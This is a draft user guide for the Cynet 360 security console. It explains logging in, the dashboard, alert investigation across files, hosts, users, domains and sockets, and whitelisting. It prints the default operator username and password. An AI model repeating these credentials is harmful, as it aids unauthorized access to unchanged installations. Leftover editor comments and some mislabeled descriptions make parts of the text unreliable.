See Cynet’s Autonomous
Breach Protection in Action

Prefer a one-on-one demo? Click here

Cynet 360 – User Guide

v3.7 | May 2020

 

Contents

1 Cynet 360 – User Guide

2 Cynet 360 Basics

2.1 Logging-into Cynet 360

2.2 Interface Layout

2.3 Dashboard

2.3.1 A: Open Alerts

2.3.2 B: Threat Radar

2.3.3 C: Files

2.3.4 D: Alerts by Date

2.3.5 E: Hosts Scanned

3 Working with Alerts—Basic

3.1 Finding Alerts

3.2 Understanding Alerts

4 Investigating Alerts

4.1 Searching for Alerts

4.1.1 Display Fields

4.1.2 Search Fields

4.1.3 Saved Searches

4.1.4 Saved Policies

4.2 Investigating File Alerts

4.2.1 File Details Page

4.2.2 Occurrences

4.2.3 Static Analysis Results

4.3 Investigating Host Alerts

4.3.1 Host Details Page

4.3.2 Hosts Details

4.3.3 Hosts Map View

4.3.4 Host Windows Events

4.3.5 Host System Overview View (IoT Discovery)

4.4 Investigating User Alerts

4.4.1 User Details Page

4.5 Investigating Domains

4.5.1 Investigating Domains and IP Addresses

4.6 Investigating Sockets

4.6.1 Socket Details View

5 Finding and Managing Alerts

5.1 Creating Alert Whitelist Profiles

5.1.1 Creating a Whitelist Profile from an Alert

5.1.2 Creating an Alert Whitelist Profile from the Whitelist Tab

5.2 Automatically Remediate Alerts

5.2.1 Creating Auto Remediation Rules

5.2.2 Editing Auto Remediation Rules

5.2.3 Deleting Auto Remediation Rules

6 NextGen AV

6.1 Activating NextGen AV

6.2 Installing the CynetEPS Detection Engine

6.3 Enabling Cynet 360 NGAV

7 Understanding Forensics

7.1 Performing Favorite Searches

7.2 File Favorite Searches

7.3 Host Favorite Searches

7.4 User Favorite Searches

7.5 Domain Favorite Searches

7.6 Socket Favorite Searches

7.7 Taking Actions

7.7.1 Taking Actions on an Alert

7.7.2 Domain Actions

7.7.3 Hosts Actions

7.7.4 Analysis Action

7.7.5 Whitelisting Actions

7.7.6 Taking Remediation Actions

7.7.7 Auto-Remediation Actions

7.7.8 Actions Page

7.8 Deception Users

7.8.1 Activating Deception Users

7.8.2 Configuring Deception Users

7.9 Deception Files

7.9.1 Deception Office Documents

7.9.2 Deception RDP Files

7.9.3 Deception ODBC Connection

7.9.4 Deception Text Files

7.9.5 Deception Stored Credentials

7.9.6 Activating Deception Files

7.9.7 Configuring Deception Files

7.9.8 Enabling Decoy Files in a Group

7.9.9 Adding a New Deception File

7.10 Deception Network

7.10.1 Activating the Deception Network

7.10.2 Configuring the Deception Network

7.10.3 Send to Soc Tab

7.10.4 Host Actions

7.10.5 Users Actions

7.10.6 Network Actions

7.11 Running Manual Scans

8 Managerial Tasks

8.1 Generating Reports

8.1.1 Generating Alerts Reports

8.1.2 Generating Top Risks Report

8.1.3 Generating Vulnerabilities Assessment (VA) Reports

8.1.4 Generating Inventory Reports

9 Auditing Actions

9.1 Auditing Using the Cynet UI

9.2 Auditing using External Log Files

10 Managing Users

10.1 Integrating with Active Directory

10.1.1 Importing User Settings Data from Active Directory (AD)

10.1.2 Importing User Settings from a CSV File

10.1.3 Creating New Users

10.1.4 Activate Chief Information Security Officer (CISO) Kit

10.1.5 Adding Users to Groups

10.2 Enabled Identities

10.3 Active Directory Authentication Settings

10.3.2 Setting the User Authentication Method

10.3.3 Managing Cynet Users

10.3.4 Configuring User SMS Confirmation Settings

10.4 Authenticating an Active Directory Group

10.5 Managing Multi-Factor Authentication (MFA)

10.5.1 Activating MFA for a User

10.5.2 Removing MFA for a User

10.6 Password Complexity

10.6.1 Changing a User’s Password

10.7 Deleting a User

11 Deception

11.1 Deception Users

11.1.1 Activating Deception Users

11.1.2 Configuring Deception Users

11.2 Deception Files

11.2.1 Deception Office Documents

11.2.2 Deception RDP Files

11.2.3 Deception ODBC Connection

11.2.4 Deception Text Files

11.2.5 Deception Stored Credentials

11.2.6 Activating Deception Files

11.2.7 Configuring Deception Files

11.2.8 Enabling Decoy Files in a Group

11.2.9 Adding a New Decoy File

11.3 Deception Network

11.3.1 Activating the Deception Network

11.3.2 Configuring the Deception Network

12 Scanning On-Demand (Threat Hunting)

12.1.1 Enabling Threat Hunting

12.1.2 Configuring Threat Hunting Settings

12.1.3 Treat Hunting Results

13 Using the Cynet SIEM API

14 Setting Up Cynet

14.1 Settings

14.2 Setting Up Cynet to Detect Threats

14.2.1 Setting Up Scan Groups

14.2.2 Additional Settings

14.2.3 Configuring Scan Population Settings

14.2.4 Configuring Scan Schedule Settings

14.2.5 Setting Scan Frequency (Throttle Settings)

14.2.6 Excluding IP Addresses and Hosts from Scans

14.2.7 Excluding Analysis Policies from Scans

14.2.8 Excluding Domains from Scans

14.2.9 Configuring Network Traffic Analysis Settings

14.2.10 Configuring Log Parser Settings

14.2.11 Analytics Server Configurations

14.2.12 Monitoring Malicious Logins

14.3 Configuring Advanced Settings

14.3.1 Configuring Connection Settings

14.3.2 Configuring Privacy & Compliance Settings

14.3.3 Disabling Collection of Data

14.3.4 Configuring Cynet SOC Settings

14.3.5 Configuring Slave Server Settings

14.3.6 Configuring Console Settings

14.3.7 Windows Events

14.3.8 File Monitoring Settings

14.4 Analysis

14.4.1 Dynamic Analysis Settings

14.4.2 Deep Scan Settings

14.4.3 Alert Process Tree

14.5 Configuring Vulnerability Management Settings

14.5.1 Configuring Windows Patch Validation:

14.5.2 Unauthorized Applications

14.5.3 Application Patch Validation

14.5.4 Agents Validation

14.5.5 Configuring UBA Management

14.6 Customizing Auto-Remediation Actions

14.6.1 Configuring Remediation Settings

14.7 Custom Remediation Playbooks

14.7.1 Configuring the Custom Remediation Playbook

14.7.2 Applying the Custom Remediation Playbook

14.8 Viewing System Information

14.8.1 Main Info

14.8.2 System Health

14.9 Configuring Alerts

14.9.1 Email Settings

14.9.2 General Settings

14.9.3 Configuring Alert Settings

14.9.4 Unscanned Host Alert Settings

14.9.5 Email Alert Filter Settings

Appendix A File Monitoring

Appendix B Windows Events

Appendix C Multi-Tenant Architecture

C.1 General Overview

C.2 Global Manager

C.3 Distributed Architecture

C.4 Traffic Router

C.5 Master/Slave architecture

Appendix D System Components

D.1 Understanding Cynet Binaries

D.1.1 Executables (Windows)

D.1.2 Daemons (Linux & Mac)

D.2 Cynet Services

D.2.1 Cynet Server Services

D.2.2 Endpoint Services (Windows)

D.2.3 Endpoint Services (Linux)

D.2.4 Endpoint Services (Mac)

D.3 CynetEPS Command-Line Flags

D.4 Terms and Abbreviations

The Cynet SOC and Support are available to customers for any issues, questions, or comments:

Phone (IL): +972-72-336-9736

Phone (US): +1-347-474-0048

Phone (EU): +44-203-290-9051

Support Email: [email protected]

CyOps Email: [email protected]

Total Environment Visibility360° Prevention and DetectionAutomated Remediation
An organization’s attack surface is much wider than its endpoints. Cynet continuously monitors all Users’ logging in and logging out, internal and external traffic, and process execution on hosts. This provides real-time contextual visibility into the entire environment’s activities.Cynet continuously builds and integrates technologies to prevent and detect attack vectors that target Users, files, the network, and hosts: AV, NGAV, EDR, network analytics, UEBA, and deception This builds a robust security protection stack across all attack stages.Cynet provides the widest set available of remediation actions for compromised hosts and Users, malicious files, and network communication. Cynet is shipped with pre-built remediation tools, making it the only solution with the ability to automatically block attacks at multiple post-compromise stages, such as privilege escalation, credential theft, and lateral movement.
Context-Based Alert OperationEasy Deployment and MaintenanceCyOps 24×7 Security Expertise
In the case of malicious activity without a matching pre-built remediation, Cynet provides the full User, file, network, and host context for rapid insight into an attack’s impact and scope. The resolving process concludes with manually applying remediation action on the compromised entity that can be saved as policy to automate response to future occurrences.Cynet is based on server-agent architecture. The server can be either on-site, IaaS, or hybrid, according to customer preference. It can either be a dissolvable executable or a lightweight agent that rapidly deploys up to 50,000 hosts in a single day.Cynet complements its automated threat protection technology with integrated security services at no additional cost. CyOps is a 24/7 team of threat analysts and security researchers that proactively hunts for threats among Cynet’s customers, as well as responding to customer escalations, assisting with file analysis, incident response, and deep investigation.

Cynet 360 Basics

This section provides instructions on logging into the system and a description of the Cynet 360 User Interface (UI).

Logging-into Cynet 360

To log into the Cynet 360 console, navigate to: https://*CYNET_SERVER*:8443.

*CYNET_SERVER* is the IP address hostname of your Cynet 360 server. Navigating to this URL brings up the Cynet 360 login page.

To log in for the first time, use the following default credentials:

Username: Operator

Password: qwdftyjkop

C:\Users\tipro\Documents\HOME\IAN\JBS\PROJECTS\Cynet\Pics\login-screen.png

Note

We recommend that you change the default Operator credentials after initial login and after creating additional User accounts.

You may receive the message “Your connection is not private”. The reason for this is that Cynet uses a self-signed certificate. To remove this message, install a CA-issued certificate on the Cynet IIS site. To ignore this message and proceed, click Advanced followed by Proceed to localhost.

Interface Layout

The Cynet 360 UI provides a simple layout for navigating the system. There are nine main sections. You can easily navigate the UI using the main navigation menu on the left side of the screen. The main sections of the UI are as shown in the following screenshot.

SectionDescription
DashboardProvides an overview of Alerts, Scans, and Analysis. See “Dashboard”.
AlertsShows all alerts generated by the system. See “Finding Alerts”.
ForensicShows all data from files, Users, hosts, and the network. See “Understanding Forensics”.
ActionsShows all remediation actions taken and the results of these actions. See “Actions”.
ScannerShows all scan results of hosts in the environment. See “Running Host Scans”.
ReportsShows all reports generated by the system. See “Generating Reports”.
MapShows a map of all configured locations. See “Maps”.
AuditShows all User actions performed with the system. See “Auditing Actions”.
SettingsEnables Users to modify all system configuration settings. See “Settings”.

In addition to the main navigation menu, some pages contain sub-menus which you can use to navigate to other pages within the section, as shown in the following screenshot.

At the top of each page of the UI, the folowing displays:

Current date and time

Current logged-in User

A link to logout of the system

If the Cynet server is configured for multi-tenancy (as in the Master-Slave architecture), a drop-down menu appears next to the current logged-in User. This menu provides access to the other Cynet servers currently configured to point to this Master server. See ‎D.2.1 “Cynet Server Services”.

Dashboard

The Dashboard provides a high-level overview of the current security status of the environment. It displays the current number of open alerts, files that have been analyzed, and hosts that have been scanned. The Dashboard enables navigation to other areas of the UI based on this information. There are five main parts to the dashboard, as shown in the following screenshot.

A: Open AlertsD: Alerts by Date
B: Threat RadarE: Hosts Scanned
C: Files

A: Open Alerts

Open Alerts displays metrics for current open alerts of all severity levels and the numbers of Files, Users, Hosts, and amount of Network traffic associated with these open alerts. The colored ring around Total Alerts indicates the severity of the alerts.

To display the number of open alerts of a certain severity, place the cursor on a colored portion of the Total Alerts ring.

To navigate to the Files, Users, Hosts, or Network alerts pages, click the associated icon.

IMPORTANT!

Currently, system alerts do not display (for example, deception files).

B: Threat Radar

The central circular area displays the overall risk level (or Total Security Score) and the “radar” area, and indicates high risk Files, Users, Hosts, and Network traffic.

The Total Security Score is calculated from the current risk levels of every File, User, Host, and Network object, as well as from any Open Alert.

Individual risk scores for objects are shown as circles in the radar area. Objects with open alerts display as solid red circles. To view more details about these alerts, click on these circles.

If the alert has a severity score of over a 1000, a notification appears under the Cynet Radar.

To display the object name and the associated Alert, click an item in the radar area. To view the details of this object, click .

C: Files

The Files area displays metrics about files that have been scanned and analyzed by the system. The percentage of “whitelisted” files indicates the number of files that have been analyzed and deemed safe by security intelligence. The Cynet CyOps SOC determines if files are safe, based on metadata collected and behavioral analysis. The SOC reviews the remaining files.

D: Alerts by Date

Alerts by Date displays a graph of alerts generated over the past ten days. The graph is a timeline of alerts generated per day.

To see the number of alerts generated on a particular day, position the cursor over that day.

E: Hosts Scanned

Hosts Scanned displays metrics of recently-scanned Hosts. It shows statistics for the number of Hosts scanned in the past day, week, and month.

Working with Alerts—Basic

When Cynet 360 identifies a suspicious or dangerous activity, it generates an alert. Alerts are divided into the following categories:

All alerts

File alerts

User alerts

Network alerts

Host alerts

Analysts might want to investigate specific alerts recorded by the system to find out more information about them.

Finding Alerts

The Alerts page provides a customizable view of the alerts generated by the system. You can use individual filters to display specific alerts, and you can take actions on displayed alerts. This page contains the following information:

SectionSection HeadingDescription
AAlert Types MenuEnables the filtering of alerts generated for Files, Users, Hosts, Network, or All Alerts.

All Alerts is the default. It includes system alerts.

BQuick SearchEnables the quick filtering of displayed alerts using a keyword search.
CAlert ActionsEnables the export of displayed alerts to an Excel file and/or taking Remediation Action. See “Taking Remediation Actions”.
DAlerts Quick Filter BarEnables the quick filtering of alerts by Alert Name, Severity, Status, Host name, File name, User name, Network, or Alert Date. You can select all currently visible alerts and perform actions on multiple alerts.
ELoad EntriesYou can use the drop-down menu to display more or fewer alerts. The default is 25 alerts.
FDisplayed AlertsThis section displays all alerts and relevant information about them according to the filter criteria set in the Alerts Filter Bar. To view details about the alert, click . See “Understanding Alerts”.
GAlert StatusThe Alert status is displayed below the Alert name. You can change the status individually or in a group.
HTotal Open AlertsDisplays the current number of open alerts and the distribution of File, Users, Network, and Host alerts.

Understanding Alerts

To view more details on displayed alerts, click .

Additional information displays as shown below.

SectionDescription
DescriptionDisplays a detailed description of the endpoint hostname of the triggered alert, IP address, OS version, CynetEPS version, and Configuration version.
RecommendationDisplays Cynet SOC recommendations for remediation actions you can take, based on the type and severity of the alert.
Process TreeDisplays all processes that were run that triggered the alert.

The tree displays the parent process (topmost), and its children, based on the process calling order (the parent leaf triggered the child leaf). The down-most process is the last process in the calling tree—this process is the one that was detected as a malicious process, by the Alert in focus.

CommentsFor tracking and analysis purposes, Analysts or the CISO, can add comments based on the investigation and resolution of the alert.
Path and HashSome alerts also indicate the file Path and Hash—to enrich the analysis and Incident Response with more metadata.

Investigating Alerts

The Forensic page enables you to perform an in-depth investigation into an Alert. For more details on using Forensic features, see “Understanding Forensics”.

Searching for Alerts

Advanced Search enables you to customize a search for Files, Hosts, Users, and Network traffic based on any of the available metadata fields, or to change the displayed fields in the Inventory List on any Forensic page.

To begin an advanced search, or to edit the displayed file fields, click Advanced Search.

The following window displays:

SectionSection HeadingDescription
ADisplay FieldsSelect or clear Display Fields to modify the Inventory.
BSearch FieldsTo specify search criteria, use Search Fields.
CSaved SearchesTo save searches for future use, use Saved Searches.
DSaved PoliciesTo apply selected search criteria as an indicator that contributes to an object’s risk level in the future, save the search criteria to Saved Policies.

Saved Policies can be configured to open an alert when the policy’s search criteria are matched.

Display Fields

You can modify the Inventory List on the Forensic pages to display additional columns. To add or remove columns from the Inventory List, select or clear fields from the Display Fields menu.

After selecting the fields you want to view, the columns in the Inventory List automatically update.

A screenshot of a computer screen Description automatically generated

Search Fields

Adding Search Field Parameters

To add a field to the Search Fields window:

In the Display Fields menu, click .

From the drop-down menu, select the appropriate logical Operator for each field added.

Enter search filters for each field.

To apply the search filters to the Inventory list, click Search.

To remove a field from the Search Fields window, click

Note

Fields not selected in the Display Fields menu can still be used in the Search Fields as search filters. Although these columns do not appear in the Inventory List, they are still applied to the search results.

Saved Searches

Search filters can be saved for future use in Saved Searches.

To save search filters:

Click Save Search.

Enter a name for the saved search.

Click OK.

The saved search appears in the Saved Searches menu.

To use the saved search, click the search name in Saved Searches. The Search Fields window populates with the search filters you saved.

To add your Saved Search to Favorite Searches, click the ☆.

To delete a Saved Search:

In Saved Searches, click X next to the Saved Search name.

Click OK.

The Saved Search is deleted.

Saved Policies

You can create Saved Policies to apply a custom risk level to objects based on collected indicators. You can also create Saved Policies to open an alert on objects relevant to the policy.

To create a Saved Policy:

Enter search filter criteria in Search Fields.

To save these filters as a policy click Save Policy.

Enter a policy name.

Enter a policy risk number between one and a thousand.

Select Open alert on policy match.

To reopen an alert for a new occurrence of an event based on your Saved Policy, select Reopen alert on new occurrence.

From the drop-down menu, select the alert severity.

Click OK.

The saved policy appears under Saved Policies. To apply the saved policy to a new search, click the policy name in Saved Policies. The Search Fields window populates with the filters in that saved policy.

To delete a Saved Policy, click X next to the Saved Policy name.

Objects that match the Saved Policy criteria appear in the object’s Details Page as a triggered indicator. The risk value you entered in Saved Policy is factored into the new risk level for the object.

If the saved policy was configured to open an alert on policy match, you receive the alert in the main alerts page.

The alert name is the policy name you selected.

Investigating File Alerts

The Forensic page Files tab provides visibility into all scanned files in the organization and enables you to obtain file-specific information. The default Files Inventory list containns the following parameters:

ParameterDescription
File NameTo access the File Details page, click File Name. COMMENT: Is this correct?
Risk LevelThe current risk level of the file.
Company NameThe file publisher information.
EndpointsThe number of endpoints where the file that triggered the alert resides.
AntivirusesThe number of antivirus vendors that have signatures for this file.
First SeenThe date and time when this file was first seen in the environment.
Last SeenThe date and time when this file was last seen in the environment.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

File Details Page

The File Details page provides information collected by the system about the selected file. At the top of the File Details page, a timeline describes the lifecycle of the file, as shown in the following screenshot.

The file relationship screenshot displays how the file is related to other entities in the organization.

SectionDescription
AThis section displays associated Hosts, Processes (parent or child), Users, or Network entities.

To obtain to the details page of an entity, click it.

BThis section displays the File Name and the Risk Level.
CThis section displays all detected Indicators for this file:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the File Details page displays multiple tabs providing detailed information about this file, as shown in the following screenshot.

Note

Some tabs may not appear in the File Details page if there is no relevant data to be displayed for that category.

SectionDescription
DetailsDisplays metadata about the file such as file size, path, publisher, and hashes.

AlertsDisplays all alerts associated with this file. The relevant remediation action tools are associated with each alert.

OccurrencesDisplays all instances of the process on all hosts. Each row shows which host or hosts it ran on, and which User or Users ran the process. See “Occurrences”.

HostsDisplays the hosts which contain this file.

UsersDisplays all Users running this file.

Static AnalysisDisplays information collected during the static analysis of the file.

SocketsDisplays the network traffic generated to and from this file.

DomainsDisplays the domains queried by this process to initiate network traffic.

Process DLLsDisplays the DLL files loaded by this process.

Dynamic AnalysisDisplays the information collected and generated from a sandbox execution of the file in the Cynet SSE.

Occurrences

The Occurrences tab displays each instance of a file throughout the environment. If a specific file was executed on two hosts, there would be two entries in the Occurrences tab.

To view additional information on each process occurrence, click +.

Each occurrence includes details about how the file ran during that instance, including the running User, command-line, and the path from which the file was run.

Static Analysis Results

To display Static Analysis results click the Static Analysis tab on the File Details Page.

The information in this section includes:

SectionSection HeadingDescription
AThe Meta areaDisplays metadata such as hashes, product name (for example, “Microsoft Windows Operations System” / version information / build information), product description, digital signature, timestamp, scattering, and fingerprinting (for example, “MS Visual C++ 8.0 DLL).
BStrings in FileDisplays all the text strings inside the file.
CThe File Analysis areaDisplays imported functions, as well as File Header Information.
DThe File Headers SectionDisplays file headers and portable execution (PE) sections and their respective hash. PE Section file types typically include .text, .rdata, .data, .pdata, .rsrc, and .reloc.

Investigating Host Alerts

The Forensic Page Hosts tab displays all scanned hosts in the organization and enables you to obtain host-specific information. The default Hosts Inventory list contains the following columns:

ColumnDescription
Host NameThis is the name of the file. To access the Host Details page, click the file name.
Risk LevelThis is the host’s current risk level.
Last ScanThe date and time when this host was last scanned by the system.
Host IPThe IP address of the endpoint.
OS VersionThe operating system of the endpoint.
# ProcessThe number of processes detected that are running on the endpoint.
# Logged UsersThe number of Users logged in to the endpoint.
# ConnectionsThe number of network connections detected at the endpoint.

You can select the columns to display in the Inventory List, as described in “Investigating User Alerts”.

Host Details Page

Click a host name to view its details. The Host Details page displays information collected by the system for the selected host. A timeline displays describing the lifecycle of the host.

The following host relationship screenshot displays how the host is related to other entities in the organization.

SectionDescription
AThis section displays associated Files, Users, and Network entities.

To access the details page of an entity, click on it.

BThis section displays the Host Name and Risk Level.
CThis section displays all detected Indicators for this file:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the Host Details page displays multiple tabs providing detailed information about this host, as shown in the following screenshot.

Hosts Details

The following sections appear in Host Details:

SectionDescription
DetailsDisplays metadata about the host such as host name, IP Address, Operating system, and software versions.

AlertsDisplays all alerts associated with this host.

FilesDisplays all the files & processes executed on this host.

UsersDisplays all the Users who are configured on the host and some additional information regarding User logins.

TrafficDisplays the Domains accessed by this host as well as: open network sockets, cached DNS requests, configured IP addresses, ARP table entries, and NICs contained on the host. (The screenshot below displays the Host’s accessed Domains).

Socket information presents full details regarding network activity on the protected asset IP & Port

Vulnerability AssessmentProvides a view of the Hosts Vulnerabilities, namely: a list of lacking Windows patches required to be installed on the Hosts (Windows Patches), and a list of the Unauthorized Applications installed on the Hosts (Unauthorized Applications)

File MonitorA complete list of the files currently monitored by Cynet on the Cynet-protected Hosts.

SystemContains several lists of: security certificates, installed Operating System updates, Installed Software, and network shares on the Hosts.

    1. Note
      1. Certain tabs might not appear in the Hosts Details page if there is no relevant data to be displayed for that category.

Hosts Map View

The Hosts Map view enables the Operator to view the organizations network segments and endpoints, in an inter-connected map display.

To access the Host Map view, select Map from the Hosts drop-down menu in Forensic.

A screenshot of a cell phone Description automatically generated

Hosts can appear in three different colors, where different colors represent the risk status of the host:

Red: High Risk

Blue: Low Risk

To collapse or expand an object, click it.

When you click a host, the host’s detailed information appears below the map.

As for the Forensic Host Alerts, the tabs under Hosts Map provide Forensic metadata selected in the map (metadata: Details, Alerts, File, Users, Traffic, System, Vulnerability Assessment, and File Monitor).

Host Windows Events

Windows Events collected appear under the Host Windows Events.

In the general view you can see the Event ID collected by Cynet as well as the Event Type (for example in the screenshot below Security Event 4624).

Expanding the selection showcases the full details of the collected event, which reveals the parsed event data divided into metadata fields.

Once the data is parsed by the Cynet server you can use the free text search to find all events that match specific keys. COMMENT: Make sure these red boxes are OK

Host System Overview View (IoT Discovery)

The Hosts System Overview view enables the Operator to view the organization hosts that had communication with IoT devices.

To access the Host System Overview view, in the Forensics Page, click the Hosts tab and select System Overview.

A screenshot of a cell phone Description automatically generated

After clicking, the following table appears:

The following sections appear in System Overview Details:

SectionDescription
HostThe Cynet-protected Endpoint or IoT device (= the device on which the Cynet EPS module is installed)
MAC AddressTypically associated with a MAC Vendor
IPIP address of the Host
First SeenSelect the start and end date for the investigated period
Last SeenSelect the start and end date for the investigated period
MAC VendorThe Vendor of the Host (for example, HP or Xerox). This value is automatically updated when it is associated with the MAC Address.
CommentsAll comments about the Host entered by Operators.

Note

If a Comment field is not displayed, it indicates that there are no comments associated with this host.

Investigating User Alerts

The Forensic page Users tab provides information on all scanned User accounts in the organization. You can also access User specific information.

The User Alert tab displays a list of all the Users’ accounts that have been logged into Cynet-protected hosts, as well as their metadata.

The default Users Inventory list contains the following columns:

ColumnDescription
NameDisplays the names of a User account that logged into a Cynet-protected asset (=a Cynet Host). To access the User Details Page, click the User’s Name.
RiskThe risk column displays the current risk score, or risk level of the User account.
LockedDisplays YES if the User account is currently locked out or NO if the User account is currently not locked out.

To filter the results between locked out or not, or to see all the accounts, select an option from the drop-down menu.

DisabledDisplays YES if the User account is currently disabled or NO if the User account is currently not disabled.

To filter the results between disabled or not, or to see all the accounts, select an option from the drop-down menu.

Running FilesDisplays the number of files currently running on the User account.
Password AgeDisplays the age of the User account password in days.
Last LoginThe date and time of the last login to a Host from the User account.
First SeenThe date and time when the User account was first seen in the environment.

You can select the columns to display in the Inventory List, as described above in “Display Fields”.

User Details Page

The Forensic page User Details tab displays information collected by the system about the selected User. A timeline displays the recorded events of the User.

Click the + to display additional information about the objects.

The User Relationship screenshot displays how the User is related to other entities in the organization.

SectionDescription
AThis section displays associated Files, Hosts, or Network entities.

To access the details page of an entity, click it.

BThis section displays the User Name and Risk Level
CThis section displays all detected Indicators for this file:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the page displays multiple tabs providing detailed information about this User, as shown in the screenshot.

TabDescription
DetailsDisplays metadata about this User such as:

User name

Last login date

Number of Files Running with the User

The number of endpoints the User logged into in the last day, week, and month.

AlertsDisplays all alerts associated with this User.

FilesDisplays all the files being run by this User.

HostsDisplays all Hosts this User has logged into.

DomainsDisplays a list of domains that the User tried to access.

SocketsDisplays the sockets accessed by this User.

LoginsDisplays a list of all logins by this User across all scanned hosts.

File MonitorDisplays file monitoring data. Default view displays all (can be filtered based on action type, Execute, Created, Deleted, Access, and Rename).

Note

Certain tabs might not appear in the Details page if there is no relevant data to be displayed for that category.

Investigating Domains

The Forensic page Domains tab provides visibility into all Domains resolved on Hosts in the Cynet-protected environment.

The default Domains Inventory list contains the following columns:

ColumnDescription
DomainThis is the resolved domain.

For additional information, click on the specific domain name (see below more details).

Risk LevelThis is the Domain’s current risk level.
ClassificationDisplays the Domain classification based on security intelligence.
Date InThe date and time when the Domain was first resolved.
Last SeenThe last time the Domain was resolved.
URL CountThe number of URLs visited with this Domain.
Host CountThe number of Hosts that have resolved this Domain.
Remote IP CountThe number of remote IP addresses that resolve to this Domain.
Source IP CountThe number of local IPs that have resolved this Domain.
User CountThe number of Users that have resolved this domain.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

Investigating Domains and IP Addresses

The Domains/IP Address Details page displays information collected by the system regarding the selected Domain. A timeline displays the User’s recorded events.

The following User Relationship screenshot displays how the User is related to other entities in the organization.

SectionDescription
AThis section displays associated Files, Hosts, and User entities. To access the details page of an entity, click it.
BThis section displays the Domain Name and Risk Level
CThis section displays all detected Indicators for this file:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the page displays multiple tabs providing detailed information about this User, as shown in the screenshot.

TabDescription
DetailsDisplays details about the domain, including:

The number of endpoints that have accessed this domain

The first/last time the domain was seen

Domain properties

Domain Overview

Security Intelligence

AlertsDisplays all alerts associated with this domain.
OccurrencesOccurrences related to this domain (for example, IP address of the domain).

HostsDisplays the Hosts accounts that have requested the domain resolution.

UsersDisplays Users related to this domain.

URLsDisplays each instance of a URL in this domain, as a remote IP address.

Remote IPS to URLsDisplays the list of the Remote IPs obtained by the specific domain URL resolution (this can also be viewed, as the list of the remote IPs that the Cynet hosts have connected to, when requesting the specific URL/Domain).

Investigating Sockets

The Forensic page Sockets tab provides visibility into all network Sockets created on Hosts in the environment.

The default Sockets Inventory list contains the following columns:

ColumnDescription
Host NameThe Host associated with the network traffic. To go to the Host Details page, click the Host Name.
Risk LevelThis is the network Socket’s current risk level.
Local IPThis is the source IP address of the network traffic. To go to the Domain/ IP_Address_Details page, click Local IP.
Local PortThis is the source port of the network traffic.
Remote IPThis is the destination IP address of the network traffic. To go to the Domain/IP Address details page, click Remote IP.
Remote PortThis is the destination port of the network traffic.
First SeenThis is the date and time of when this network traffic was first seen by CynetEPS.
Last SeenThis is the date and time of when this network traffic was last seen by CynetEPS.

You can select the columns to display in the Inventory List, as described in “Display Fields”.

Clicking on the Host Name leads the User to the Host Forensics details page, related to the clicked Host that enables the User to obtain a holistic view of the clicked Host’s Users, Alerts, Files, Sockets, Domains, and Vulnerability Assessment.

To drill-down on the specific Host’s socket monitoring, click on the Host’s Local IP.

Socket Details View

When clicking on the Host’s Local IP column, in the Socket Alert view, the Socket Forensics view is shown. The Socket Forensics view displays detailed Socket information collected by the system regarding the selected Socket (Local IP of the specific Host).

A timeline displays the User’s recorded events.

The following Socket relationship screenshot displays how the Socket is related to other entities in the organization (Users, File, and Hosts). If the metadata allows it, information, Indicators are also provided (this is not the case in the following screenshot) COMMENT: Unclear

SectionDescription
AThis section displays associated Files, Hosts, and User entities. To access the details page of an entity, click it.
BThis section displays the Socket (here, the Local IP) and its Risk Level.
CThis section displays all detected Indicators for this Socket:

High severity indicators display in Red.

Medium severity indicators display in Gold.

Low severity indicators display in Blue.

Positive indicators display in Green.

The lower section of the page displays multiple tabs providing detailed information about this User, as shown in the screenshot.

TabDescription
DetailsDisplays details about the domain, including:

The Local IP of the Socket

The Remote IP of the Socket

The Port used by the Socket

The File’s SHA256, for exchanged files over the Socket

Remote IP: Known vs Unknown? Local or external to the LAN?

First and Last seen

FilesDisplays a list of the Files that have used the monitored Socket – including additional metadata (risk score incurred, NTFS owner, Running User, Host name, AV score, File type, File Status, Date in, and Last Seen).

HostsDisplays a list of the Host accounts that have used the Socket.

Including the Host metadata (Risk score, Last scan date, Host IP, OS Version, # of Processes running, # of logged-in Users, and # of current connections).

UsersDisplays a list of the Users that have used the socket.

Including the User’s account metadata (User Name, Risk level, Account Locked, Account Disabled, Running files – files run by this User, User’s Password age, Last login, First date seen in the Network, and Last date seen).

Finding and Managing Alerts

When an alert is generated, Cynet offers Operators options for Whitelisting or Remediation.

Creating Alert Whitelist Profiles

Cynet 360 enables you to list applications and parameters that are authorized to run in the User’s environment. Cynet does not generate alerts for anything that is whitelisted.
There are two ways to create alert whitelist profiles: (COMMENT: The formatting for the 2 ways is not correct. The first step should be “1.” And not just a bullet, and the second way should have “2.”, but it should be under the “1.”. This structural error appears throughout the document.)

From the Alert: Create whitelisting profiles directly from the displayed alert. This enables Operators to:

Name and populate whitelist profiles by extracting available data from the Alert

Filter the whitelisting options to match the alert type

Add the Whitelist to the Audit

From the Whitelisting tab: Create whitelisting profiles manually from the whitelisting tab. This enables Operators to create profiles before they appear in an alert. (COMMENT – see above)

Creating a Whitelist Profile from an Alert

To create a whitelist rule from an alert:

From the alert list on the Alert, Forensic, or Actions page, select the alert.

Click Action.

Select the Whitelisting tab.

In the Profile Name field, enter a descriptive name.

Under Whitelisted by, select the relevant options.

Under Whitelist for, select the relevant options.

Click Create Profile.

A screenshot of a cell phone Description automatically generated

Creating an Alert Whitelist Profile from the Whitelist Tab

The Whitelisting tab on the Settings menu enables Operators to create rules to exclude arguments from the detection and remediation mechanism. Examples of these arguments are:

Files

Users

Hashes

IP Addresses

To Configure a Whitelist Rule

From the Setting Page, select the Whitelisting tab.

A screenshot of a computer screen Description automatically generated

Click Create (COMMENT – this is another example of Procedure steps that are different from the ones above – for your designer to remedy)

Enter the profile name

Select the alert to whitelist and the type of alert on which the exclusion will be based

Note

When you create a rule, you exclude arguments across all Cynet agents on the network.

          1. Enter the value according to the type of information selected
          2. Click +

Cynet 360 implements the Whitelist Rule.

Optional: The Whitelist can also be configured based on a specific scan group or host.

Notes

Once the Whitelist rule is added, the alert does NOT display anymore according to the rule that was set.

“All Alerts” means that the Whitelist is applied to all alerts under “Applied on alert”.

Automatically Remediate Alerts

